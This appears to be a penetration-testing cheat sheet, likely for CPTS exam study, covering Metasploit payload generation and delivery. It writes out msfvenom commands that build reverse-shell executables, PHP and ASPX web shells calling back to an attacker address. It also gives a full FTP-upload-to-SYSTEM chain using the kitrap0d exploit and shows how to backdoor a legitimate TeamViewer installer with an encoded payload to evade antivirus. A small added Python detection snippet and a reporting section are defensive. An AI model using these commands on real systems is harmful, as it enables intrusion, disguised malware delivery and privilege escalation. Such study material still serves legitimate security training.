πŸ›‘οΈ Methodology Checklist

  • Select payload: msfvenom --list payloads | grep [OS]
  • Generate Windows EXE: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f exe -o shell.exe
  • Generate PHP webshell: msfvenom -p php/meterpreter_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f raw -o shell.php
  • Start handler before delivering payload: use exploit/multi/handler
  • Set handler payload to match venom payload exactly
  • Deliver payload (upload, social engineering, exploit)
  • Confirm callback and stabilise session

🎯 Operational Context

Use when: Full workflow for generating, delivering, and catching MSF payloads, from msfvenom generation through handler setup to an active session.
Think Dumber First: Generate payload → confirm architecture match → start listener BEFORE delivering payload → deliver → catch session. Order matters: if the listener isn't up when the payload runs, the connection is missed and you may not get another chance.
Skip when: Using an MSF exploit module directly; the venom workflow is for standalone payload delivery.


⚡ Tactical Cheatsheet

| Command | Tactical Outcome |
| --- | --- |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=1337 -f aspx > shell.aspx | Generate ASPX Meterpreter payload for IIS |
| use multi/handler | Load generic catch-all listener |
| set payload windows/meterpreter/reverse_tcp | MUST match the msfvenom payload exactly |
| set LHOST [LHOST]; set LPORT 1337; run | Start handler to catch ASPX shell |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[PORT] -k -x [LEGIT_APP].exe -f exe -o backdoored.exe | Inject payload into legitimate executable |
| use post/multi/recon/local_exploit_suggester | Find kernel exploits for current session |
| set SESSION [ID]; run | Run suggester against backgrounded session |
| use exploit/windows/local/ms10_015_kitrap0d | Kitrap0d local privilege escalation |
| set SESSION [ID]; set LPORT [PORT]; run | Run local exploit (new port for second shell) |

🔬 Deep Dive & Workflow

Scenario: FTP → Web Shell → SYSTEM

A common CPTS scenario: anonymous FTP write access to the IIS web root.

# 1. Generate ASPX reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
 
# 2. Upload via FTP
ftp [TARGET_IP]
> binary
> put reverse_shell.aspx
 
# 3. Set up listener (payload must match exactly)
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 1337
run
 
# 4. Trigger via browser
# http://[TARGET_IP]/reverse_shell.aspx
# Browser hangs → handler catches Meterpreter session
 
# 5. Land as IIS APPPOOL\Web (low priv) → escalate
meterpreter > bg
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# Output: Identified ms10_015_kitrap0d
 
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
set LPORT 1338   # CRITICAL: new port, not 1337
run
# → NT AUTHORITY\SYSTEM
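Seen from the defender's side, the same FTP → web shell → callback chain leaves a detectable pattern on the host: a server-executable file written into the web root, followed shortly by an outbound connection from the IIS worker process. The Python below is an added example (not from the original page) that correlates constructed sample log lines of both kinds; the log format, worker process names and egress allowlist are assumptions, and it generalises beyond IIS to the other web tiers in the page's format table.

```python
import re
from datetime import datetime, timedelta

# Script extensions that must never arrive via anonymous FTP into a web root (page's format table)
WEB_EXEC_EXT = (".aspx", ".asp", ".war", ".jsp", ".php", ".exe")
# Web worker processes (assumed names); outbound connections from these are rare.
WEB_WORKERS = {"w3wp.exe", "httpd", "php-fpm", "tomcat"}
# Destinations the web tier may legitimately reach (constructed, e.g. internal SQL).
EGRESS_ALLOWLIST = {"10.0.0.20:1433"}

# Constructed sample events (not real logs): FTP uploads, then Sysmon-style net connections
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01Z ftp user=anonymous cmd=STOR path=C:\\inetpub\\wwwroot\\reverse_shell.aspx",
    "2024-05-01T10:00:05Z ftp user=anonymous cmd=STOR path=C:\\inetpub\\wwwroot\\logo.png",
    "2024-05-01T10:02:30Z netconn image=w3wp.exe user=IIS APPPOOL\\Web dst=10.10.14.5:1337",
    "2024-05-01T10:02:31Z netconn image=w3wp.exe user=IIS APPPOOL\\Web dst=10.0.0.20:1433",
]

# key=value pairs; the lookahead lets values such as "IIS APPPOOL\Web" contain spaces
FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")

def parse_event(line):
    """Split '<timestamp> <type> k=v k=v ...' into a dict."""
    ts, kind, rest = line.split(" ", 2)
    ev = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "type": kind}
    ev.update(FIELD_RE.findall(rest))
    return ev

def script_uploads(events):
    """FTP writes whose target file has a server-executable extension."""
    return [e for e in events if e["type"] == "ftp" and e.get("cmd") == "STOR"
            and e["path"].lower().endswith(WEB_EXEC_EXT)]

def worker_egress(events):
    """Outbound connections from a web worker to a non-allowlisted destination."""
    return [e for e in events if e["type"] == "netconn"
            and e.get("image") in WEB_WORKERS and e["dst"] not in EGRESS_ALLOWLIST]

def correlate(lines, window=timedelta(minutes=15)):
    """Pair each suspicious upload with a later worker egress inside the window."""
    events = [parse_event(l) for l in lines]
    alerts = []
    for up in script_uploads(events):
        for conn in worker_egress(events):
            if timedelta(0) <= conn["ts"] - up["ts"] <= window:
                alerts.append({"file": up["path"], "dst": conn["dst"],
                               "proc": conn["image"], "user": conn.get("user")})
    return alerts
```

Running `correlate(SAMPLE_EVENTS)` flags only the .aspx upload paired with the w3wp.exe connection to 10.10.14.5:1337; the image upload and the allowlisted SQL connection produce nothing.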

multi/handler: The Universal Catcher

Use multi/handler to catch connections from any standalone payload (not just MSF-generated exploits):

use multi/handler
set payload [EXACT_PAYLOAD_USED_IN_MSFVENOM]
set LHOST tun0
set LPORT [PORT]
run

The payload type in the handler must exactly match the msfvenom payload: staged vs stageless matters (windows/meterpreter/reverse_tcp is staged, windows/meterpreter_reverse_tcp is stageless; the slash versus underscore is the only visible difference).

Executable Template Injection (-x and -k flags)

Embed shellcode into a legitimate, trusted executable to avoid AV flagging an unknown binary:

# A '\' line continuation must be the last character on its line, so the flag notes sit below the command.
msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
  -k \
  -x ~/Downloads/TeamViewer_Setup.exe \
  -e x86/shikata_ga_nai -a x86 --platform windows \
  -o ~/Desktop/TeamViewer_Setup.exe -i 5
# -k           keep template behaviour: payload runs in a separate thread, app stays functional
# -x           legitimate app used as the template
# -e / -i      encoder and iteration count
# -a / --platform   pin architecture and OS to the template

User runs TeamViewer_Setup.exe → TeamViewer installs normally → payload executes in a background thread.

Port Conflicts: Using New Ports for Second Shell

When running a local exploit for privesc, the original handler is already using a port. Always set a different LPORT for the privilege escalation shell:

set SESSION 1
set LHOST tun0
set LPORT 1338   # NOT the same as the original 1337 shell
run

Format Reference (Quick)

| Target | Flag | Extension |
| --- | --- | --- |
| IIS (Windows) | -f aspx | .aspx |
| Tomcat (Java) | -f war | .war |
| Apache (Linux) | -f php | .php |
| Windows | -f exe | .exe |

πŸ› οΈ Troubleshooting & Edge Cases

| Problem | Cause | Fix |
| --- | --- | --- |
| Payload generated but no session | Handler not running before delivery | Always start the handler first: use multi/handler → set options → exploit -j |
| msfvenom exits with error | Missing payload or bad option | Verify the payload name: msfvenom --list payloads \| grep [KEYWORD] |
| EXE runs on target but crashes | Platform or architecture mismatch | Match the payload architecture to the target process: a 32-bit process on a 64-bit OS still needs an x86 payload |
| Handler catches connection but stalls | Network jitter | set ListenerTimeout 300; use an HTTPS payload for a more stable connection |
| Generated payload too large for buffer overflow | Staged payload needed | Use a staged payload (meterpreter/reverse_tcp) for a smaller initial stub |

πŸ“ Reporting Trigger

Finding Title: End-to-End Payload Delivery Achieves Interactive Shell
Impact: Successful msfvenom payload generation and delivery establishes an interactive Meterpreter session, providing complete post-exploitation capability from a single exploit execution.
Root Cause: Target application vulnerable to code execution with unrestricted outbound network access. No payload delivery controls in place.
Recommendation: Patch the exploited vulnerability. Implement egress filtering. Deploy behavioral EDR. Establish process allowlisting to prevent unauthorized executable delivery.